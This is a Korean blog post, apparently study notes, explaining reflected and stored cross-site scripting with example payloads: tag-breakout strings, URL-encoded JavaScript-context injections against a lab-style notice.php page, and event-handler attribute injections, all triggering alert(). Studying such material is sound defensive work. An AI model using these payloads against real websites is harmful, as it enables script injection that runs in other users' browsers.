반응형
개요
- 공격자가 삽입 또는 제공한 악의적인 스크립트가 사용자의 브라우저에서 실행되는 취약점
원인
- 악의적인 스크립트 코드가 삽입된 입력값을 서버가 적절한 검증절차 없이 반환 하는 것
Reflected XSS (반사형 크로스사이트 스크립팅)
- 공격자가 악의적인 스크립트가 포함된 url을 메신저, 메일 등을 이용하여 사용자에게 노출시키고 이 url에 사용자가 접근 할 경우 스크립트가 실행되어 피해를 발생시킴
<input class="form-control multiselect-search" id="keyword" name="keyword" type="text" value="
"/><script>alert(1);</script><test data=""
onkeyup="search();"/>
//매개변수 중 필터링이 되지 않는 부분 탐색
GET /exam16/notice.php?pageIndex=pagetestxss<>/&board_id=board_idxss<>/&sorting=sortingxss<>/&sotingAd=DESC&startDt=&endDt=&searchType=&keyword=
//공격코드
"/><script>alert(1);</script><test+data="
'%3balert("XSS")%3bvar+b%3d'
'%3b}alert("XSS")%3b{'
//최종 공격 코드
'%3b}alert("XSS")%3bfunction+at(){var+b+%3d'
var+a+%3d+%27%3b%7dalert(%22XSS%22)%3bfunction(aa)%7bvar+b%3d%27%2c
Stored XSS
- 공격자가 악의적인 스크립트를 취약한 서버에 게시물 형태로 등록 시킨 후 사용자가 해당 게시물에 접근 시 스크립트가 실행되어 피해를 발생시킴
공격방식
- 입력값이 그대로 문자열로 나올 때
- <p> 입력값 </p>
- 입력값이 tag안에서 나올 때
- <input type=”text” value=”입력값”/>
- 입력값 : “/> <test data=”
- <input type = “text” value””/> <img scr = x onclick=”alert();”/>
- 입력값이 <sciprt>안에 있을 때
- <sciprt> 태그 확인하여 공격문 삽입 “/~~
- tag안에 입력값이 들어가는데 scipt도 안되고 <> 안되고 img 안되는 경우
- <input type=”text” value=””/>
- 입력값 “ onkeydown=”alert(’XSS’)” data=”
반응형
'WEB' 카테고리의 다른 글
XSS 의 대응방안 (1) | 2023.08.03 |
---|---|
SQL Injection 정리 (0) | 2023.05.15 |